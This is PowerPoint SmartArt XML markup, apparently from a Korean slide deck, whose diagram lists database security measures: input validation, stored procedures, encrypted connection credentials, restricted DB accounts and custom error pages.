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61" r:id="rId7"/>
    <p:sldId id="26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59" r:id="rId23"/>
    <p:sldId id="260" r:id="rId24"/>
    <p:sldId id="263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8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292" r:id="rId48"/>
    <p:sldId id="264" r:id="rId49"/>
    <p:sldId id="26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03E"/>
    <a:srgbClr val="1F4E79"/>
    <a:srgbClr val="666666"/>
    <a:srgbClr val="474747"/>
    <a:srgbClr val="222222"/>
    <a:srgbClr val="225686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-72" y="-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FA223-84D7-418F-9350-950A2F3F63CC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23CB550E-7F12-4D01-A678-1503E37AB198}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
            <a:t>Validation Check</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDCD0851-AD52-4EA7-93E8-87624AA74CA3}" type="parTrans" cxnId="{AD023E19-5115-448D-840B-28EFE9039B3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9350F0DF-34E6-4160-84EB-8982B3CF37B5}" type="sibTrans" cxnId="{AD023E19-5115-448D-840B-28EFE9039B3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
            <a:t>Stored Procedure</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91D91953-150C-4D9A-A22F-00DA58951BC2}" type="parTrans" cxnId="{46110EFF-BA20-4843-8CDE-6F7D1DDF6CB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2838DF9E-CBD8-4331-B019-771FC884E51C}" type="sibTrans" cxnId="{46110EFF-BA20-4843-8CDE-6F7D1DDF6CB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9BE086C-80A3-46F6-9095-742AC82FE384}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" smtClean="0"/>
            <a:t>Encryption</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1261177-B1E0-4D0B-A952-E8EF79E71E69}" type="parTrans" cxnId="{F9A364CF-2F2A-4666-AB36-DED1C5EFCFBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0D10F0D-6B30-485B-907B-5381E3B4481A}" type="sibTrans" cxnId="{F9A364CF-2F2A-4666-AB36-DED1C5EFCFBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99FF6CF0-460B-480A-AF64-093106EA4512}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
            <a:t>Custom Error Page </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
            <a:t>사용</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E015ECE-3615-4D28-8455-30B54BF41A0F}" type="parTrans" cxnId="{CE41609C-5E7A-45F5-BD73-7DE070C63F60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2AE8466-2CD3-4C38-ACBE-C989EAF10239}" type="sibTrans" cxnId="{CE41609C-5E7A-45F5-BD73-7DE070C63F60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
            <a:t>제한된 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
            <a:t>DB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
            <a:t>접근계정</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{277D2430-4D4C-4277-A20E-F87A62C73CDA}" type="parTrans" cxnId="{48455299-FDCA-4781-85D0-3D3B73D9C604}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8F505C4-12F6-4D67-9116-E23E06ECA958}" type="sibTrans" cxnId="{48455299-FDCA-4781-85D0-3D3B73D9C604}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{267BC7C8-8607-4CC2-9C49-D8221197AE40}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1500" smtClean="0"/>
            <a:t>Input Textbox</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" smtClean="0"/>
            <a:t>의 구문 검증 및 확인</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7500A0B3-8F77-46AF-B3C2-5BB2746A8324}" type="parTrans" cxnId="{8B0A804B-0F9D-4C1E-B419-6EC507E6B025}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F1F5F4C-3091-42D5-BDFC-F7B1157D5C39}" type="sibTrans" cxnId="{8B0A804B-0F9D-4C1E-B419-6EC507E6B025}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024A6032-4243-44ED-88B1-6666FCA07C19}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1500" smtClean="0"/>
            <a:t>SQL Query</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" smtClean="0"/>
            <a:t>의 노출을 최소화</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1F9C951-1578-4ACF-9E49-176D96D5CF3F}" type="parTrans" cxnId="{8B988EB0-2884-45EA-A514-559520AA7C26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EFF8294-E97C-4E38-BAE3-393EFED5C640}" type="sibTrans" cxnId="{8B988EB0-2884-45EA-A514-559520AA7C26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D11221A9-7B0B-4FFF-AA30-1BC2950B0069}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1500" smtClean="0"/>
            <a:t>DB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" smtClean="0"/>
            <a:t>연결계정 정보 암호화</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9C14087-3E82-4002-9723-9EB3DD66C610}" type="parTrans" cxnId="{E2787253-1B25-436C-9F89-068EFF0E67A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B6F26B4-4B44-4E40-BB23-F59A98D7062D}" type="sibTrans" cxnId="{E2787253-1B25-436C-9F89-068EFF0E67A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E5DAF29-92EB-4CFB-8E7D-18108F3B9D63}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1500" smtClean="0"/>
            <a:t>DB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" smtClean="0"/>
            <a:t>접근 계정을 제한</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E81F1A88-E6A9-4153-95E2-924B46DA3125}" type="parTrans" cxnId="{17667939-58C4-49FB-BEA0-9620BDA65CA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B7F5C30-F6E3-4197-8F8A-ECFCEB0811AC}" type="sibTrans" cxnId="{17667939-58C4-49FB-BEA0-9620BDA65CA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6AF1EA6-27A6-4370-9803-7465F6AA2914}">
      <dgm:prSet phldrT="[텍스트]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" smtClean="0"/>
            <a:t>에러발생시 최소 페이지만을 보여주어 정보 노출을 막음</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{622CAD15-AA25-4484-9A8A-DC37EAE8A882}" type="parTrans" cxnId="{8C215138-4EC7-4A9E-B0E8-C8CD4950776F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27547AC9-883D-4DE4-AB6E-CD006121C1BA}" type="sibTrans" cxnId="{8C215138-4EC7-4A9E-B0E8-C8CD4950776F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" type="pres">
      <dgm:prSet presAssocID="{8FBFA223-84D7-418F-9350-950A2F3F63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46AED1-B046-4FED-A8D4-BC68CB8DDFC5}" type="pres">
      <dgm:prSet presAssocID="{23CB550E-7F12-4D01-A678-1503E37AB198}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA56D732-8DF3-4618-B0B6-4338A90C2E51}" type="pres">
      <dgm:prSet presAssocID="{23CB550E-7F12-4D01-A678-1503E37AB198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DD6623B-BD1C-44E1-BCF5-8B7562696477}" type="pres">
      <dgm:prSet presAssocID="{23CB550E-7F12-4D01-A678-1503E37AB198}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custLinFactNeighborY="-118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515EEA-E9C3-4B5E-93F8-78E170ECB96E}" type="pres">
      <dgm:prSet presAssocID="{23CB550E-7F12-4D01-A678-1503E37AB198}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5981D3E9-D87A-400D-A1E8-419D734559A6}" type="pres">
      <dgm:prSet presAssocID="{23CB550E-7F12-4D01-A678-1503E37AB198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C086F0-EAFC-42C8-BD78-67FA07FD537F}" type="pres">
      <dgm:prSet presAssocID="{9350F0DF-34E6-4160-84EB-8982B3CF37B5}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4C75051-D970-43B2-9EEA-3B5AA71312C7}" type="pres">
      <dgm:prSet presAssocID="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6ADEF42-1019-4917-9AB2-E38384489186}" type="pres">
      <dgm:prSet presAssocID="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" presName="parentLeftMargin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79832CA-9C12-4A51-B00D-689DE2D45529}" type="pres">
      <dgm:prSet presAssocID="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F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7467CC-F44F-4C92-832D-3784D9846588}" type="pres">
      <dgm:prSet presAssocID="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2965B721-39CC-4172-9FF4-64DB27EC97C8}" type="pres">
      <dgm:prSet presAssocID="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F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EE4192-6646-43C9-83EB-AA48ED2ABE04}" type="pres">
      <dgm:prSet presAssocID="{2838DF9E-CBD8-4331-B019-771FC884E51C}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{658DE3BA-B066-4FF0-B5B3-E30AE6AA835D}" type="pres">
      <dgm:prSet presAssocID="{C9BE086C-80A3-46F6-9095-742AC82FE384}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1873845-1937-452A-8A62-5B1BEBE5F65E}" type="pres">
      <dgm:prSet presAssocID="{C9BE086C-80A3-46F6-9095-742AC82FE384}" presName="parentLeftMargin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07E65839-578B-43B9-A637-4B9E890CAB0B}" type="pres">
      <dgm:prSet presAssocID="{C9BE086C-80A3-46F6-9095-742AC82FE38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A91E26-0FFD-493A-9B10-334B987D8D7B}" type="pres">
      <dgm:prSet presAssocID="{C9BE086C-80A3-46F6-9095-742AC82FE384}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6A6CD2E3-40C5-4484-96DC-7EF11F01EA30}" type="pres">
      <dgm:prSet presAssocID="{C9BE086C-80A3-46F6-9095-742AC82FE384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912BEE-BCC9-4ADA-B664-03E1D55ED1F2}" type="pres">
      <dgm:prSet presAssocID="{E0D10F0D-6B30-485B-907B-5381E3B4481A}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B114C21-FB59-4D25-B31C-FB2755D63560}" type="pres">
      <dgm:prSet presAssocID="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8909F61-C0AC-4B28-8CF8-E7D215FB4460}" type="pres">
      <dgm:prSet presAssocID="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" presName="parentLeftMargin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D01A8BE-3C48-420A-80E7-75C9E67665E4}" type="pres">
      <dgm:prSet presAssocID="{3C384EDA-EB81-41E6-A186-A1B9E57404D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541763-3282-4078-8A22-5919CB072CF8}" type="pres">
      <dgm:prSet presAssocID="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6E96FB7-6D88-46B0-AFBB-B40853DBA5FA}" type="pres">
      <dgm:prSet presAssocID="{3C384EDA-EB81-41E6-A186-A1B9E57404D4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4E23EC-29B5-4E36-9760-D7C2FE59041F}" type="pres">
      <dgm:prSet presAssocID="{C8F505C4-12F6-4D67-9116-E23E06ECA958}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7211C45C-6960-4259-886C-33230B014E70}" type="pres">
      <dgm:prSet presAssocID="{99FF6CF0-460B-480A-AF64-093106EA4512}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0E47E5F-5C88-4EBD-AD8F-8874EEAE8DFB}" type="pres">
      <dgm:prSet presAssocID="{99FF6CF0-460B-480A-AF64-093106EA4512}" presName="parentLeftMargin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D730379-AB2C-40C2-92AB-C74808517AC3}" type="pres">
      <dgm:prSet presAssocID="{99FF6CF0-460B-480A-AF64-093106EA451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009CF9-0914-4F4D-8207-0E9DB4A6240A}" type="pres">
      <dgm:prSet presAssocID="{99FF6CF0-460B-480A-AF64-093106EA4512}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99F4CF9B-54E1-4EA4-A118-08431576FF53}" type="pres">
      <dgm:prSet presAssocID="{99FF6CF0-460B-480A-AF64-093106EA4512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559C231-5A8E-49DC-B221-729DC1A3EC00}" type="presOf" srcId="{C9BE086C-80A3-46F6-9095-742AC82FE384}" destId="{07E65839-578B-43B9-A637-4B9E890CAB0B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC1B9A42-2CE6-4D33-A46C-F0022462B9E3}" type="presOf" srcId="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" destId="{B6ADEF42-1019-4917-9AB2-E38384489186}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8C215138-4EC7-4A9E-B0E8-C8CD4950776F}" srcId="{99FF6CF0-460B-480A-AF64-093106EA4512}" destId="{F6AF1EA6-27A6-4370-9803-7465F6AA2914}" srcOrd="0" destOrd="0" parTransId="{622CAD15-AA25-4484-9A8A-DC37EAE8A882}" sibTransId="{27547AC9-883D-4DE4-AB6E-CD006121C1BA}"/>
    <dgm:cxn modelId="{48455299-FDCA-4781-85D0-3D3B73D9C604}" srcId="{8FBFA223-84D7-418F-9350-950A2F3F63CC}" destId="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" srcOrd="3" destOrd="0" parTransId="{277D2430-4D4C-4277-A20E-F87A62C73CDA}" sibTransId="{C8F505C4-12F6-4D67-9116-E23E06ECA958}"/>
    <dgm:cxn modelId="{75226CD1-329A-402D-8C6B-035838AE1056}" type="presOf" srcId="{7E5DAF29-92EB-4CFB-8E7D-18108F3B9D63}" destId="{F6E96FB7-6D88-46B0-AFBB-B40853DBA5FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E2CB9ED3-E27E-444F-96E2-67C2412C8058}" type="presOf" srcId="{267BC7C8-8607-4CC2-9C49-D8221197AE40}" destId="{5981D3E9-D87A-400D-A1E8-419D734559A6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4EC4C014-FCC3-41A0-A85C-8A5A85F9E437}" type="presOf" srcId="{D11221A9-7B0B-4FFF-AA30-1BC2950B0069}" destId="{6A6CD2E3-40C5-4484-96DC-7EF11F01EA30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B988EB0-2884-45EA-A514-559520AA7C26}" srcId="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" destId="{024A6032-4243-44ED-88B1-6666FCA07C19}" srcOrd="0" destOrd="0" parTransId="{D1F9C951-1578-4ACF-9E49-176D96D5CF3F}" sibTransId="{5EFF8294-E97C-4E38-BAE3-393EFED5C640}"/>
    <dgm:cxn modelId="{F9A364CF-2F2A-4666-AB36-DED1C5EFCFBF}" srcId="{8FBFA223-84D7-418F-9350-950A2F3F63CC}" destId="{C9BE086C-80A3-46F6-9095-742AC82FE384}" srcOrd="2" destOrd="0" parTransId="{E1261177-B1E0-4D0B-A952-E8EF79E71E69}" sibTransId="{E0D10F0D-6B30-485B-907B-5381E3B4481A}"/>
    <dgm:cxn modelId="{FB59E644-86B7-4B3C-874A-2EE7D7D91C56}" type="presOf" srcId="{024A6032-4243-44ED-88B1-6666FCA07C19}" destId="{2965B721-39CC-4172-9FF4-64DB27EC97C8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5A1C5413-26C5-4170-A768-E5E8015EACDA}" type="presOf" srcId="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" destId="{B8909F61-C0AC-4B28-8CF8-E7D215FB4460}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EF0686FC-2407-4FB1-9BDF-5722E6FA1C3D}" type="presOf" srcId="{F6AF1EA6-27A6-4370-9803-7465F6AA2914}" destId="{99F4CF9B-54E1-4EA4-A118-08431576FF53}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1BEB125A-5DC7-492F-8D70-A9B356B4995E}" type="presOf" srcId="{C9BE086C-80A3-46F6-9095-742AC82FE384}" destId="{C1873845-1937-452A-8A62-5B1BEBE5F65E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CB3EB939-3973-4AF7-856D-78C2637CDD33}" type="presOf" srcId="{23CB550E-7F12-4D01-A678-1503E37AB198}" destId="{DA56D732-8DF3-4618-B0B6-4338A90C2E51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CE41609C-5E7A-45F5-BD73-7DE070C63F60}" srcId="{8FBFA223-84D7-418F-9350-950A2F3F63CC}" destId="{99FF6CF0-460B-480A-AF64-093106EA4512}" srcOrd="4" destOrd="0" parTransId="{9E015ECE-3615-4D28-8455-30B54BF41A0F}" sibTransId="{B2AE8466-2CD3-4C38-ACBE-C989EAF10239}"/>
    <dgm:cxn modelId="{1F1B98FC-8CBD-4966-9CA7-581A0737904C}" type="presOf" srcId="{99FF6CF0-460B-480A-AF64-093106EA4512}" destId="{FD730379-AB2C-40C2-92AB-C74808517AC3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8C8EE8DB-A108-4785-A9B5-D4D73C981297}" type="presOf" srcId="{99FF6CF0-460B-480A-AF64-093106EA4512}" destId="{D0E47E5F-5C88-4EBD-AD8F-8874EEAE8DFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AD023E19-5115-448D-840B-28EFE9039B3A}" srcId="{8FBFA223-84D7-418F-9350-950A2F3F63CC}" destId="{23CB550E-7F12-4D01-A678-1503E37AB198}" srcOrd="0" destOrd="0" parTransId="{DDCD0851-AD52-4EA7-93E8-87624AA74CA3}" sibTransId="{9350F0DF-34E6-4160-84EB-8982B3CF37B5}"/>
    <dgm:cxn modelId="{3BE087A8-8720-48DD-A45C-EA2EF5B4DEC0}" type="presOf" srcId="{8FBFA223-84D7-418F-9350-950A2F3F63CC}" destId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E2787253-1B25-436C-9F89-068EFF0E67A8}" srcId="{C9BE086C-80A3-46F6-9095-742AC82FE384}" destId="{D11221A9-7B0B-4FFF-AA30-1BC2950B0069}" srcOrd="0" destOrd="0" parTransId="{E9C14087-3E82-4002-9723-9EB3DD66C610}" sibTransId="{1B6F26B4-4B44-4E40-BB23-F59A98D7062D}"/>
    <dgm:cxn modelId="{8B0A804B-0F9D-4C1E-B419-6EC507E6B025}" srcId="{23CB550E-7F12-4D01-A678-1503E37AB198}" destId="{267BC7C8-8607-4CC2-9C49-D8221197AE40}" srcOrd="0" destOrd="0" parTransId="{7500A0B3-8F77-46AF-B3C2-5BB2746A8324}" sibTransId="{1F1F5F4C-3091-42D5-BDFC-F7B1157D5C39}"/>
